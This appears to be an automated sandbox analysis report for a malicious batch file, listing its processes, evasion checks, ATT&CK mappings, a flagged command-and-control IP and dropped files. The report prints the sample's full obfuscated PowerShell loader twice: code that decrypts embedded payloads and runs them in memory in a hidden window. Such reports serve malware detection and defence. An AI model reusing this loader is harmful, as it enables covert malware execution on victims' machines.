Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb. source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb: source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1716592666.000001BB7EA32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B8A4C02 push eax; iretd 6_2_00007FFD9B8A4C69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B8B095D push esp; retf 6_2_00007FFD9B8B095E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B8A776A push eax; iretd 6_2_00007FFD9B8A786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\3F8E9C71781CC56F1C2A 82BCF176D913F0776418319F42DC5D04ED32E1FA7228CC3802D41E62B5147256
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4908Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4988Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6183Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1073Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6528Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep count: 6183 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 1073 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp 
([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\15.bat';$mmjz='gelyestclyesurlyesrenlyestlyesprolyesceslyesslyes'.replace('lyes', ''),'chfgxtanfgxtgfgxteefgxtxfgxttefgxtnsfgxtifgxtofgxtnfgxt'.replace('fgxt', ''),'eletqwbmetqwbntqwbtattqwb'.replace('tqwb', ''),'crafgseafgsaafgstafgseafgsdecafgsryafgsptafgsorafgs'.replace('afgs', ''),'srlybprlyblrlybirlybtrlyb'.replace('rlyb', ''),'doaanecooaanmpoaanresoaansoaan'.replace('oaan', ''),'enhilctrhilcyhilcpohilcinhilcthilc'.replace('hilc', ''),'cdynropdynrytodynr'.replace('dynr', ''),'reaoapidlioapinesoapi'.replace('oapi', ''),'indqrqvodqrqkedqrq'.replace('dqrq', ''),'tratglinstglifotglirmtglifitglinatglilbltgliotglictgliktgli'.replace('tgli', ''),'mbkbwaibkbwnbkbwmodbkbwulbkbwebkbw'.replace('bkbw', ''),'froxggooxggmbaoxggseoxgg64soxggtroxggioxggngoxgg'.replace('oxgg', ''),'loajyrjdjyrj'.replace('jyrj', '');powershell -w hidden;function fbejp($jkmlp){$uerdi=[system.security.cryptography.aes]::create();$uerdi.mode=[system.security.cryptography.ciphermode]::cbc;$uerdi.padding=[system.security.cryptography.paddingmode]::pkcs7;$uerdi.key=[system.convert]::($mmjz[12])('dvsan8ricigbsq5peusffnrqief7d6jhj+mhqgaxpxa=');$uerdi.iv=[system.convert]::($mmjz[12])('rrmf8ddsiotkjyw5ahoolg==');$ytgvg=$uerdi.($mmjz[3])();$ftqfx=$ytgvg.($mmjz[10])($jkmlp,0,$jkmlp.length);$ytgvg.dispose();$uerdi.dispose();$ftqfx;}function mpycc($jkmlp){$fjjxj=new-object system.io.memorystream(,$jkmlp);$sysfb=new-object system.io.memorystream;$rdfpf=new-object system.io.compression.gzipstream($fjjxj,[io.compression.compressionmode]::($mmjz[5]));$rdfpf.($mmjz[7])($sysfb);$rdfpf.dispose();$fjjxj.dispose();$sysfb.dispose();$sysfb.toarray();}$bklld=[system.io.file]::($mmjz[8])([console]::title);$onbkh=mpycc (fbejp ([convert]::($mmjz[12])([system.linq.enumerable]::($mmjz[2])($bklld, 5).substring(2))));$hudry=mpycc (fbejp 
([convert]::($mmjz[12])([system.linq.enumerable]::($mmjz[2])($bklld, 6).substring(2))));[system.reflection.assembly]::($mmjz[13])([byte[]]$hudry).($mmjz[6]).($mmjz[9])($null,$null);[system.reflection.assembly]::($mmjz[13])([byte[]]$onbkh).($mmjz[6]).($mmjz[9])($null,$null); "
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (24 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
ATT&CK tactics and techniques (numbers in parentheses are the counts shown next to the technique in the matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (131); Command and Scripting Interpreter (11); PowerShell (1); Cron; Launchd; Scheduled Task
Persistence: Scripting (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (151); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (14); Process Discovery (1); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); System Information Discovery (23); Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1429038, Sample: 15.bat, Start date: 20/04/2024, Architecture: WINDOWS, Score: 68)

  • Start: Snort IDS alert for network traffic; Antivirus detection for URL or domain
    • cmd.exe started: Very long command line found
      • cmd.exe started: Very long command line found
        • powershell.exe started: 193.222.96.128, 4449, 49730, 49738 (SWISSCOMSwisscomSwitzerlandLtdCH, Germany); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found
          • powershell.exe started
        • conhost.exe started
        • cmd.exe started
      • conhost.exe started

Source | Detection | Scanner | Label
15.bat | 5% | ReversingLabs |
15.bat | 5% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://crl.microsoft | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.1713621454.000001BB76AB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1713621454.000001BB7697E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB66CD7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://crl.microsoft | powershell.exe, 00000006.00000002.1698215372.000001BB663C6000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000006.00000002.1698349267.000001BB67832000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.1713621454.000001BB76AB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1713621454.000001BB7697E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB6850E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000006.00000002.1698349267.000001BB668F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.1698349267.000001BB668F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.org | powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
193.222.96.128 | unknown | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1429038
Start date and time: 2024-04-20 10:05:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 15.bat
Detection: MAL
Classification: mal68.evad.winBAT@11/10@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 67%
  • Number of executed functions: 5
  • Number of non-executed functions: 3
Cookbook Comments:
  • Found application associated with file extension: .bat
  • Override analysis time to 240s for powershell
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 72.21.81.240
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information
Time | Type | Description
10:05:57 | API Interceptor | 15586908x Sleep call for process: powershell.exe modified
                No context
                No context
Match: SWISSCOMSwisscomSwitzerlandLtdCH

Associated Sample Name / URL | Detection | Threat Name | Context
ShippingOrder_ GSHS2400052.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 193.222.96.147
Encrypted_PaymentAdvice_Reference.html | malicious | HTMLPhisher | 193.222.96.119
z42MNA2024000000041-KWINTMADI-11310Y_K.exe | malicious | GuLoader, Remcos | 193.222.96.21
z14Novospedidosdecompra_Profil_4903.exe | malicious | GuLoader, Remcos | 193.222.96.21
UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | 193.222.96.21
wFtZih4nN9.elf | malicious | Mirai | 85.7.65.219
dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbs | malicious | GuLoader, Remcos | 193.222.96.11
http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ | malicious | HTMLPhisher | 193.222.96.132
enEQvjUlGl.elf | malicious | Mirai | 178.194.189.44
Oo2yeTdq5J.elf | malicious | Mirai | 85.2.40.128
                No context
                No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 69993
Entropy (8bit): 7.99584879649948
Encrypted: true
SSDEEP: 1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
MD5: 29F65BA8E88C063813CC50A4EA544E93
SHA1: 05A7040D5C127E68C25D81CC51271FFB8BEF3568
SHA-256: 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
SHA-512: E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
Malicious: false
Reputation: moderate, very likely benign file
                Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):330
                Entropy (8bit):3.139206469813435
                Encrypted:false
                SSDEEP:6:kKBlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:JlMkPlE99SNxAhUeVLVt
                MD5:A3DACFA0F0F602EEB4894B54ED7228F1
                SHA1:856A6B3CC26B92BEDAA5D0598A467BC457D1C052
                SHA-256:3E97091CB04ED8491BBEB056667718E4FB73EB5E5B060A2BCE892F8F55758747
                SHA-512:95831E9410F9D6173A01B840C3416C5C407ED2E3E669405243DA97622E743E6B7CD1AFBCFC2E6EBE98A783280E1D963F52108D5CF2AE609743B3ABE452C40450
                Malicious:false
                Reputation:low
                Preview:p...... .........bf.`H..(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):9713
                Entropy (8bit):4.93568648418653
                Encrypted:false
                SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smwY1D:lVib49Vkjh4iUxlYvcYKib4o
                MD5:A7EDDF0DCC37957ABAFE63CE6D0BE4CA
                SHA1:5B09680EF1C3C405D698481E1364BE0C412C7A9C
                SHA-256:B9F314DC6C4DDB176CB92C77ECB5FCA91FB58FBE12DCFD9CEB4E8BFFC07B5327
                SHA-512:A906C8FFAB88AD0CEAD9A5B4D7D4089C1621A8D36F7190EF6FD829B0D942BBBC89E76424C46E204282B6985C02ABD3488082A6A2A4D88CDE396C480E2989AF73
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):2832
                Entropy (8bit):5.414030276061799
                Encrypted:false
                SSDEEP:48:0AzsSU4YymI4RIoUeCa+m9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlHYvIIfLz9qrh7KrJ5Eo9Adrxz
                MD5:BAF5A10C59FD93E444E5B672D7CCB1D4
                SHA1:906BB875AB47D641756F44E09633F75AFDDDD638
                SHA-256:B029CB8CEA8D97BF6F636D2BE3F7A0F3334A07E22B832581A3D1D1F282AFC637
                SHA-512:B52A2F66B83271814381F897CD32B83ED97F18553EEDB8DDABE99B93EAF58C46A362E6255B0744C41C5E91042238E15ED9E4CF46C11446937B850F104965087A
                Malicious:false
                Reputation:low
                Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
